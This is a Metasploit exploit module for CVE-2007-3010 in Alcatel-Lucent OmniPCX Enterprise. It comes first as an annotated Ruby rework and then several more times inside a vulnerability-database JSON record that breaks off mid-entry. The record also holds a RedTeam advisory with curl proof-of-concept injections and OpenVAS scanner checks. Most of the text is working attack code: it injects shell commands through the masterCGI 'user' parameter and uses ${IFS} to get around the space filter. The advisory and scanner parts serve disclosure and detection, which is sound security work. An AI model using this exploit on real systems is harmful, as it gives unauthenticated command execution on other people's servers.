##
# $Id: alcatel_omnipcx_mastercgi_exec.rb 10556 2010-10-05 23:13:04Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
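class Metasploit3 < Msf::Exploit::Remote

	# Only a single, non-interactive command runs per request: the httpd
	# reaps whatever masterCGI spawned once the HTTP 200 OK is sent, so no
	# reverse/bind shell ever survives and no session is established.
	Rank = ManualRanking # Only interactive single commands supported

	include Msf::Exploit::Remote::Tcp

	# Characters that would corrupt the injected query string before the
	# command reaches the shell: '&' terminates the 'user' parameter, '+'
	# and '%' are decoded by the CGI layer (a decoded space aborts the
	# command, per the RedTeam advisory), '#' and '?' are URL delimiters,
	# and tab/CR/LF break the HTTP request line itself.
	UNSAFE_QUERY_CHARS = /[&+%#?\t\r\n]/

	# Module metadata: CVE-2007-3010, unauthenticated command injection via
	# the 'user' parameter of masterCGI's 'ping' action, running as 'httpd'.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',
			'Description'    => %q{
					This module abuses a metacharacter injection vulnerability in the
				HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise
				Communication Server 7.1 and earlier. The Unified Maintenance Tool
				contains a 'masterCGI' binary which allows an unauthenticated attacker
				to execute arbitrary commands by specifing shell metacharaters as the
				'user' within the 'ping' action to obtain 'httpd' user access. This
				module only supports command line payloads, as the httpd process kills
				the reverse/bind shell spawn after the HTTP 200 OK response.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10556 $',
			'References'     =>
				[
					[ 'OSVDB', '40521' ],
					[ 'BID', '25694' ],
					[ 'CVE', '2007-3010' ],
					[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			# Commands run as the web server user, never root.
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic'
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget'  => 0,
			# NOTE(review): the RedTeam advisory (rt-sa-2007-001) records the
			# coordinated public release as 2007-09-17; confirm this date.
			'DisclosureDate' => 'Sep 09 2007'))

		register_options(
			[
				# The management interface is normally reached over HTTPS.
				Opt::RPORT(443),
				OptBool.new('SSL', [true, 'Use SSL', true]),
			], self.class)
	end

	# Sends one GET request carrying the command-line payload in the 'user'
	# parameter and prints the command output masterCGI echoes back.
	#
	# Aborts before touching the network if the payload contains characters
	# that would break the query string (see UNSAFE_QUERY_CHARS). The socket
	# is always released, including on the early-return path that prints
	# the captured output.
	def exploit
		raw = payload.encoded
		if raw =~ UNSAFE_QUERY_CHARS
			print_error("Payload contains a character (& + % # ? tab CR LF) that would break the injected query string; choose another command")
			return
		end

		cmd = command_for_query(raw)

		connect
		begin
			req =
				"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +
				"Host: #{rhost}\r\n\r\n"

			print_status("Sending GET request with command line payload...")
			sock.put(req)

			# Read for up to 3s; res is nil when nothing came back.
			res = sock.get(3, 3)

			out = parse_command_output(res)
			if out
				print_line(out)
				return
			end

			handler
		ensure
			disconnect
		end
	end

	# Rewrites spaces as ${IFS}: masterCGI aborts the command on any literal
	# or URL-encoded space, but the shell still expands ${IFS} to whitespace.
	def command_for_query(raw)
		raw.gsub(" ", '${IFS}')
	end

	# Extracts the command output from the HTTP response. masterCGI wraps
	# the ping output in <h5>...</h5>; the greedy match spans from the first
	# opening tag to the last closing tag, so any nested tags are stripped.
	# Returns nil for an empty response or one without an <h5> element.
	#
	# The original regexp used /smi; in Ruby 's' is not "dotall" (that is
	# 'm', already present) but forces Windows-31J encoding, which on
	# Ruby 1.9+ raises Encoding::CompatibilityError against binary
	# responses containing non-ASCII bytes. Only /mi is used here.
	def parse_command_output(res)
		return nil unless res
		m = res.match(/<h5>(.*)<\/h5>/mi)
		return nil unless m
		m[1].gsub(/<h5>|<\/h5>/, '')
	end

end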
{"id": "EDB-ID:16857", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "description": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution. CVE-2007-3010. Webapps exploit for cgi platform", "published": "2010-10-05T00:00:00", "modified": "2010-10-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16857/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2007-3010"], "lastseen": "2016-02-02T06:40:48", "viewCount": 13, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-02-02T06:40:48", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3010"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/ALCATEL_OMNIPCX_MASTERCGI_EXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:30591", "EDB-ID:10031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8163", "SECURITYVULNS:DOC:18015"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:59383", "PACKETSTORM:82234"]}, {"type": "openvas", "idList": ["OPENVAS:103480", "OPENVAS:1361412562310103480"]}], "modified": "2016-02-02T06:40:48", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://www.exploit-db.com/download/16857/", "sourceData": "##\r\n# $Id: alcatel_omnipcx_mastercgi_exec.rb 10556 2010-10-05 23:13:04Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking # Only interactive single commands supported\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\r\n\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\r\n\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\r\n\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\r\n\t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\r\n\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\r\n\t\t\t\tmodule only supports command line payloads, as the httpd process kills\r\n\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10556 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '40521' ],\r\n\t\t\t\t\t[ 'BID', '25694' ],\r\n\t\t\t\t\t[ 'CVE', '2007-3010' ],\r\n\t\t\t\t\t[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' 
=> 0,\r\n\t\t\t'DisclosureDate' => 'Sep 09 2007'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tcmd = payload.encoded.gsub(\" \", '${IFS}')\r\n\t\treq =\r\n\t\t\t\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host: #{rhost}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Sending GET request with command line payload...\")\r\n\t\tsock.put(req)\r\n\r\n\t\tres = sock.get(3,3)\r\n\r\n\t\tif (res =~ /<h5>(.*)<\\/h5>/smi)\r\n\t\t\tout = $1\r\n\t\t\tprint_line(out.gsub(/<h5>|<\\/h5>/, ''))\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["40521"]}
{"cve": [{"lastseen": "2020-10-03T11:45:51", "description": "masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server R7.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the user parameter during a ping action.", "edition": 3, "cvss3": {}, "published": "2007-09-18T21:17:00", "title": "CVE-2007-3010", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3010"], "modified": "2018-10-16T16:46:00", "cpe": ["cpe:/a:alcatel-lucent:omnipcx:7.1"], "id": "CVE-2007-3010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:27", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82234", "href": "https://packetstormsecurity.com/files/82234/Alcatel-Lucent-OmniPCX-Enterprise-masterCGI-Arbitrary-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution', \n'Description' => %q{ \nThis module abuses a metacharacter injection vulnerability in the \nHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise \nCommunication Server 7.1 and earlier. The Unified Maintenance Tool \ncontains a 'masterCGI' binary which allows an unauthenticated attacker \nto execute arbitrary commands by specifing shell metacharaters as the \n'user' within the 'ping' action to obtain 'httpd' user access. This \nmodule only supports command line payloads, as the httpd process kills \nthe reverse/bind shell spawn after the HTTP 200 OK response. \n}, \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'OSVDB', '40521' ], \n[ 'BID', '25694' ], \n[ 'CVE', '2007-3010' ], \n[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ], \n], \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic' \n} \n}, \n'Targets' => \n[ \n[ 'Automatic Target', { }] \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \n], self.class) \nend \n \ndef exploit \nconnect \n \ncmd = payload.encoded.gsub(\" \", '${IFS}') \nreq = \n\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" + \n\"Host: #{rhost}\\r\\n\\r\\n\" \n \nprint_status(\"Sending GET request with command line payload...\") \nsock.put(req) \n \nres = sock.get(3,3) \n \nif (res =~ 
/<h5>(.*)<\\/h5>/smi) \nout = $1 \nprint_line(out.gsub(/<h5>|<\\/h5>/, '')) \nreturn \nend \n \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82234/alcatel_omnipcx_mastercgi_exec.rb.txt"}, {"lastseen": "2016-12-05T22:20:19", "description": "", "published": "2007-09-18T00:00:00", "type": "packetstorm", "title": "rt-sa-2007-001.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-18T00:00:00", "id": "PACKETSTORM:59383", "href": "https://packetstormsecurity.com/files/59383/rt-sa-2007-001.txt.html", "sourceData": "`Advisory: Alcatel-Lucent OmniPCX Remote Command Execution \n \nRedTeam Pentesting discovered a remote command execution in the \nAlcatel-Lucent OmniPCX during a penetration test. The masterCGI script \nof the OmniPXC integrated communication solution web interface is \nvulnerable to a remote command execution. Attackers can run arbitrary \ncommands with the permissions of the web application user. \n \n \nDetails \n======= \n \nProduct: Alcatel-Lucent OmniPCX \nAffected Versions: All versions up to and including R7.1 \nFixed Versions: All supported versions \nVulnerability Type: Remote Command Execution \nSecurity-Risk: high \nVendor-URL: http://www1.alcatel-lucent.com/psirt/statements.htm \nreference number 2007002 \nVendor-Status: Informed, patch available \nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php \nAdvisory-Status: public \nCVE: CVE-2007-3010 \nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010 \n \n \nIntroduction \n============ \n \n\"The OmniPCX Enterprise is an integrated communications solution for \nmedium-sized businesses and large corporations. 
It combines the best of \nthe old (legacy TDM phone connectivity) with the new (a native IP \nplatform and support for Session Initiation Protocol, or SIP) to provide \nan effective and complete communications solution for cost-conscious \ncompanies on the cutting edge.\" \n \n(from the vendor's homepage) \n \n \nMore Details \n============ \n \nThe OmniPCX web interface has a CGI script \"masterCGI\" which offers a \n\"ping\" functionality. By running the script with the parameters \"ping\" \nand \"user\", one is able to ping any IP address reachable from the server \nthe webinterface is running on. \n \ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1\" \n \nThe ping will be done on the server, running the ping program installed \non it. The vulnerability lies in the \"user\" variable not being filtered \nwhen passed to the shell. Thus, arbitrary commands can be executed on \nthe server by adding them to the user variable, separated by semicolons. \nSpaces have to be encoded by using the internal field separator ${IFS}, \nas any normal or URL encoded space will abort the command execution. \n \n \nProof of Concept \n================ \n \ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\\${IFS}-l;\" \n \n \nWorkaround \n========== \n \nDeactivate the Web server at the loss of some functionality not related \nto telephony service. Interpose a firewall allowing access to the web \ninterface of the OXE to IP addresses who should have access to the \nserver (e.g. maintenance technicians). \n \n \nFix \n=== \n \nCorrect filtering of shell meta-characters and tighter access control \nhave been implemented in all supported versions. \n \n \nSecurity Risk \n============= \n \nThe risk of this vulnerability is high. Any user which has access to the \nweb interface of the OmniPCX Enterprise solution will be able to execute \narbitrary commands on the server with the permissions of the webserver. 
\n \n \nHistory \n======= \n \n2007-05-07 First contact with head of technical staff of Alcatel-Lucent. \nWill relay the information to their technicians and call back \nwith further information. \n2007-05-09 Response with a pointer to the Alcatel-Lucent PSIRT and the \nwebsite http://www1.alcatel-lucent.com/psirt, where the \nprocess of reporting a security vulnerability is explained. \nThe advisory gets mailed to the email address provided there. \n2007-05-10 Advisory gets acknowledged by the PSIRT \n2007-05-23 Vulnerability gets confirmed by Alcatel-Lucent \n2007-06-18 CVE number assigned \n2007-09-17 Coordinated public release with Alcatel-Lucent \n \n \nReferences \n========== \n \nhttp://www1.alcatel-lucent.com/psirt/statements.htm \nreference number 2007002 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting is offering individual penetration tests, short \npentests, performed by a team of specialised IT-security experts. \nHereby, security weaknesses in company networks or products are \nuncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttp://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 963-1300 \nDennewartstr. 25-27 Fax : +49 241 963-1304 \n52068 Aachen http://www.redteam-pentesting.de/ \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen, Claus R. F. 
Overbeck \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/59383/rt-sa-2007-001.txt"}], "openvas": [{"lastseen": "2018-02-06T13:07:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3010"], "description": "Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\n\nAttackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver; other\nattacks are also possible.\n\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.", "modified": "2018-02-05T00:00:00", "published": "2012-04-26T00:00:00", "id": "OPENVAS:103480", "href": "http://plugins.openvas.org/nasl.php?oid=103480", "type": "openvas", "title": "Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_lucent_omnipcx_25694.nasl 8654 2018-02-05 08:19:22Z cfischer $\n#\n# Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\n\nAttackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver; other\nattacks are also possible.\n\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.\";\n\ntag_solution = \"The vendor has released an advisory along with fixes to address this\nissue. Please see the referenced advisory for information on\nobtaining fixes.\";\n\nif (description)\n{\n script_id(103480);\n script_bugtraq_id(25694);\n script_cve_id(\"CVE-2007-3010\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 8654 $\");\n\n script_name(\"Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/25694\");\n script_xref(name : \"URL\" , value : \"http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/479699\");\n script_xref(name : \"URL\" , value : \"http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 09:19:22 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 13:55:46 
+0200 (Thu, 26 Apr 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n \nport = get_http_port(default:80);\n\nurl = \"/index.html\"; \nbuf = http_get_cache(port:port, item:url);\n\nif(\"<title>OmniPCX\" >< buf) {\n\n url = '/cgi-bin/masterCGI?ping=nomip&user=;id;';\n\n if(http_vuln_check(port:port, url:url,pattern:\"uid=[0-9]+.*gid=[0-9]+.*\",check_header:TRUE)) {\n security_message(port:port);\n exit(0);\n } else {\n exit(99);\n } \n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-08T11:04:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3010"], "description": "Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.", "modified": "2020-05-05T00:00:00", "published": "2012-04-26T00:00:00", "id": "OPENVAS:1361412562310103480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103480", "type": "openvas", "title": "Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free 
software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103480\");\n script_bugtraq_id(25694);\n script_cve_id(\"CVE-2007-3010\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-05T09:44:01+0000\");\n\n script_name(\"Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/25694\");\n script_xref(name:\"URL\", value:\"http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/479699\");\n script_xref(name:\"URL\", value:\"http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 13:55:46 +0200 (Thu, 26 Apr 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n 
script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"The vendor has released an advisory along with fixes to address this\nissue. Please see the referenced advisory for information on\nobtaining fixes.\");\n script_tag(name:\"summary\", value:\"Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver, other\nattacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nurl = \"/index.html\";\nbuf = http_get_cache(port:port, item:url);\n\nif(\"<title>OmniPCX\" >< buf) {\n\n url = '/cgi-bin/masterCGI?ping=nomip&user=;id;';\n\n if(http_vuln_check(port:port, url:url,pattern:\"uid=[0-9]+.*gid=[0-9]+.*\",check_header:TRUE)) {\n security_message(port:port);\n exit(0);\n } else {\n exit(99);\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T11:46:25", "description": "Alcatel-Lucent OmniPCX Enterprise Communication Server. CVE-2007-3010. 
Webapps exploit for cgi platform", "published": "2007-09-17T00:00:00", "type": "exploitdb", "title": "Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-17T00:00:00", "id": "EDB-ID:10031", "href": "https://www.exploit-db.com/exploits/10031/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\r\n\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\r\n\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\r\n\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\r\n\t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\r\n\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. 
